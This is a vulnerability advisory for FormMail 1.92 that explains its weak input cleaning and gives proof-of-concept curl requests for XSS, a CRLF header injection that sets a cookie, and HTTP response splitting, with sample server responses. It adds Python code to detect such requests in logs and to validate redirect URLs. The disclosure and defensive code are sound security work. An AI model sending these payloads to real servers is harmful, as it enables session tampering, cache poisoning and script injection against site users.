Multiple vulnerabilities exist in the FormMail software: cross site scripting, HTTP response header injection and HTTP response splitting.
Credit:
The information has been provided by Francesco "ascii" Ongaro, Giovanni "evilaliv3" Pellerano, Antonio "s4tan" Parata.
The original article can be found at: http://www.ush.it/team/ush/hack-formmail_192/adv.txt
Vulnerable Systems:
* FormMail version 1.92
A) Prelude to the vulnerabilities
What follows is the code used to validate the user input:
Line 283: $safeConfig array definition.
foreach $field (keys %Config) {
    $safeConfig{$field} = &clean_html($Config{$field});
}
Line 518: definition of the clean_html function, used to generate the "$safeConfig" array from "$Config".
# This function will convert <, >, & and " to their HTML equivalents.
sub clean_html {
    local $value = $_[0];
    $value =~ s/\&/\&amp;/g;
    $value =~ s/</\&lt;/g;
    $value =~ s/>/\&gt;/g;
    $value =~ s/"/\&quot;/g;
    return $value;
}
These functions are not applied to every piece of user input, and they don't protect against all attack vectors (for example URI-based or DOM XSS, which work even when the value is HTML-encoded); this is why various vulnerabilities exist.
B) Cross Site Scripting vulnerability
Line 293: the "redirect" variable is used to write the value of the Location header. Its value is not filtered, so it's possible to perform both HTTP Header Injection and HTTP Response Splitting attacks.
Since Header Injection is one of the most versatile attack vectors, we could use it (or rather "downgrade" it) to perform a Cross Site Scripting attack, but that would not represent a different vulnerability.
In this case we are already inside a "Location" response header, and it's possible to perform an XSS without splitting the response, using the standard Apache page for the 302 Found HTTP status.
# If redirect option is used, print the redirectional location header.
if ($Config{'redirect'}) {
    print "Location: $safeConfig{'redirect'}\n\n";
}
XSS vulnerability example:
http://127.0.0.1/FormMail.pl?recipient=evilaliv3@ush.it&subject=1&redirect=javascript:alert(%27USH%27);
Response:
$ curl -kis "http://127.0.0.1/FormMail.pl?recipient=evilaliv3@ush.it&subject=1&redirect=javascript:alert(%27USH%27);"
HTTP/1.1 302 Found
Date: Sat, 11 Apr 2009 14:12:11 GMT
Server: Apache
Location: javascript:alert('USH');
Content-Length: 267
Content-Type: text/html; charset=iso-8859-1
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="javascript:alert('USH');">here</a>.</p>
<hr>
<address>Apache Server at 127.0.0.1 Port 80</address>
</body></html>
Obviously the XSS is not automatic, since browsers don't follow the "javascript:" URI handler in the "Location" header.
A second XSS vulnerability, not based on HTTP tricks, exists.
Line 371: the "$return_link" variable is reflected (printed) in the page body without any validation:
# Check for a Return Link and print one if found.
if ($Config{'return_link_url'} && $Config{'return_link_title'}) {
    print "<ul>\n";
    print "<li><a href=\"$safeConfig{'return_link_url'}\">$safeConfig{'return_link_title'}</a>\n";
    print "</ul>\n";
}
The vulnerability can be triggered with the following request:
$ curl -kis "http://127.0.0.1/FormMail.pl?recipient=evilaliv3@ush.it&subject=1&return_link_url=javascript:alert(%27USH%27);&return_link_title=USH"
This XSS is not automatic.
C) HTTP Response Header Injection
An HTTP Response Header Injection vulnerability exists; the following request triggers it:
$ curl -kis "http://127.0.0.1/FormMail.pl?recipient=evilaliv3@ush.it&subject=1&redirect=http://www.example.com%0D%0aSet-Cookie:auth%3DUSH;vuln%3DHTTPHeaderInjection;"
It can be verified with the obvious "javascript:alert(document.cookie)".
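As an added example that is not part of this advisory, the following Python script scans Apache combined-format access log lines for the request shapes described here: a query parameter that decodes to a value containing CR/LF (the header injection and response splitting requests) or that starts with a "javascript:"-style URI scheme (the XSS requests). The log lines, hostnames and function names are constructed for this example and are not taken from FormMail or Apache.

```python
# Added example, not part of the advisory: scan Apache combined-format access
# log lines for query parameters that carry percent-encoded CR/LF (header
# injection / response splitting) or a javascript:-style URI (the XSS cases).
# The log lines and hostnames below are constructed; the function names are
# this example's own, not FormMail or Apache APIs.
import re
from urllib.parse import urlsplit, parse_qsl

# Constructed sample lines in Apache combined log format.
SAMPLE_LOG = """\
127.0.0.1 - - [11/Apr/2009:14:12:10 +0000] "GET /FormMail.pl?recipient=user@example.com&subject=1&redirect=http://www.example.com/thanks.html HTTP/1.1" 302 267 "-" "curl/7.19"
127.0.0.1 - - [11/Apr/2009:14:12:11 +0000] "GET /FormMail.pl?recipient=user@example.com&subject=1&redirect=javascript:alert(%27USH%27); HTTP/1.1" 302 267 "-" "curl/7.19"
127.0.0.1 - - [12/Apr/2009:23:01:18 +0000] "GET /FormMail.pl?recipient=user@example.com&subject=1&redirect=http://www.example.com%0D%0aSet-Cookie:auth%3DUSH HTTP/1.1" 302 0 "-" "curl/7.19"
127.0.0.1 - - [12/Apr/2009:23:01:19 +0000] "GET /index.html HTTP/1.1" 200 1024 "-" "Mozilla/5.0"
"""

# The quoted request line: method, target, protocol version.
_REQ = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')
# Any C0 control character (CR and LF included) or DEL, after percent-decoding.
_CTRL = re.compile(r"[\x00-\x1f\x7f]")
# Leading URI scheme of a decoded parameter value.
_SCHEME = re.compile(r"^\s*([a-z][a-z0-9+.-]*):", re.IGNORECASE)
_DANGEROUS_SCHEMES = {"javascript", "data", "vbscript"}


def classify_params(target):
    """Return (parameter name, finding) pairs for one request target.
    parse_qsl() percent-decodes each value, so %0D%0A becomes a real CR/LF
    before the control-character check runs."""
    findings = []
    for name, value in parse_qsl(urlsplit(target).query, keep_blank_values=True):
        if _CTRL.search(value):
            findings.append((name, "control-char"))
        m = _SCHEME.match(value)
        if m and m.group(1).lower() in _DANGEROUS_SCHEMES:
            findings.append((name, m.group(1).lower() + "-uri"))
    return findings


def scan_log(text):
    """Return one alert dict per log line whose query string has a finding."""
    alerts = []
    for lineno, line in enumerate(text.splitlines(), 1):
        m = _REQ.search(line)
        if not m:
            continue
        findings = classify_params(m.group("target"))
        if findings:
            alerts.append({"line": lineno, "target": m.group("target"),
                           "findings": findings})
    return alerts


if __name__ == "__main__":
    for alert in scan_log(SAMPLE_LOG):
        print("line %d: %s" % (alert["line"], alert["findings"]))
```

Run against the constructed log the script reports lines 2 and 3 only: the benign redirect and the request without a query string produce no finding. Decoding happens once, as the web server does it, so a value only appears as CR/LF if the server would actually have seen it that way.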
D) HTTP Response Splitting
Because the Header Injection vulnerability is fully exploitable, an HTTP Response Splitting attack can also be performed.
The following request is an example of the attack:
http://127.0.0.1/FormMail.pl?recipient=evilaliv3@ush.it&subject=1&redirect=http://www.ush.it%0D%0A%0FContent-Length:%200%0D%0AContent-Type:%20text/plain%0D%0AStatus:302%0D%0A%0D%0AHTTP/1.1%20200%20OK%0D%0AContent-Type:%20text/plain%0D%0Ahttp://www.ush.it
$ curl -kis "http://127.0.0.1/FormMail.pl?recipient=evilaliv3@ush.it&subject=1&redirect=%0D%0A%0FContent-Length:%200%0D%0AContent-Type:%20text/plain%0D%0AStatus:302%0D%0A%0D%0AHTTP/1.1%20200%20OK%0D%0AContent-Type:%20text/plain%0D%0Ahttp://www.ush.it"
HTTP/1.1 302 Found
Date: Sun, 12 Apr 2009 23:01:18 GMT
Server: Apache
Content-Length: 0
Location:
Transfer-Encoding: chunked
Content-Type: text/plain
HTTP/1.1 200 OK
Content-Type: text/plain
http://www.ush.it
HTTP Response Splitting can be used to trigger a number of different vectors, ranging from automatic Reflected XSS to Browser and Proxy Cache Poisoning.
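All four findings in sections B, C and D come from the same two facts: clean_html() only escapes four HTML metacharacters, and the "redirect" and "return_link_url" values are emitted into a header or into an href without checking what kind of URL they are. The following added example (written in Python rather than FormMail's Perl, and not code from FormMail or its author) ports clean_html() so the gap is visible, and beside it puts a validator that rejects control characters before any parsing and allows only http/https or site-relative targets. The function names and the fallback page "/thanks.html" are this example's own assumptions.

```python
# Added example (not FormMail's own code): a Python port of FormMail 1.92's
# clean_html() beside a URL validator for the "redirect" and
# "return_link_url" values covered by this advisory. Function names and the
# fallback page are this example's own (hypothetical), not FormMail APIs.
import re
from urllib.parse import urlsplit


def clean_html(value):
    """Port of FormMail's clean_html(): only <, >, & and " are escaped.
    "javascript:" and CR/LF pass through untouched, which is why the
    advisory's inputs survive it unchanged."""
    return (value.replace("&", "&amp;")
                 .replace("<", "&lt;")
                 .replace(">", "&gt;")
                 .replace('"', "&quot;"))


# Any C0 control character (CR and LF included) or DEL. A value carrying one
# of these must never be placed in a response header: that is the root of
# the header injection and response splitting findings.
_CTRL = re.compile(r"[\x00-\x1f\x7f]")


def is_safe_url(value, allowed_schemes=("http", "https")):
    """Accept only a control-character-free absolute URL whose scheme is on
    the allow-list, or a site-relative path. javascript:, data:,
    protocol-relative //host and CR/LF payloads are all rejected."""
    # Check control characters BEFORE parsing: urlsplit() in current Python
    # silently strips tab, CR and LF, which would hide the injection.
    if _CTRL.search(value):
        return False
    parts = urlsplit(value)
    if parts.scheme == "":
        # No scheme: allow "/path" but not "//host/path" (protocol-relative).
        return value.startswith("/") and not value.startswith("//")
    return parts.scheme.lower() in allowed_schemes and parts.netloc != ""


def location_header(redirect, default="/thanks.html"):
    """The Location header line FormMail emits at line 293, but with the
    user-supplied target validated and a fixed fallback page otherwise."""
    target = redirect if is_safe_url(redirect) else default
    return "Location: " + target + "\r\n"


def return_link_html(url, title):
    """The return link FormMail prints at line 371: the URL must pass
    is_safe_url(), and both parts are HTML-escaped before being embedded."""
    if not is_safe_url(url):
        return ""
    return ('<ul>\n<li><a href="%s">%s</a>\n</ul>\n'
            % (clean_html(url), clean_html(title)))


if __name__ == "__main__":
    for v in ("http://www.example.com/thanks.html",
              "javascript:alert('USH');",
              "http://www.example.com\r\nSet-Cookie:auth=USH"):
        print(repr(v), "->", is_safe_url(v))
```

The order of the checks matters: the control-character test runs on the raw string, because a URL parser that normalises away CR and LF would otherwise report the injected value as a clean http URL. An allow-list of schemes, rather than a deny-list of "javascript:", is what keeps data: and other script-capable schemes out of the href as well.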
Disclosure Timeline:
20070501 Bug discovered
20070531 Initial vendor contact -- No response
20090505 Second vendor contact -- No response
20090511 Advisory Release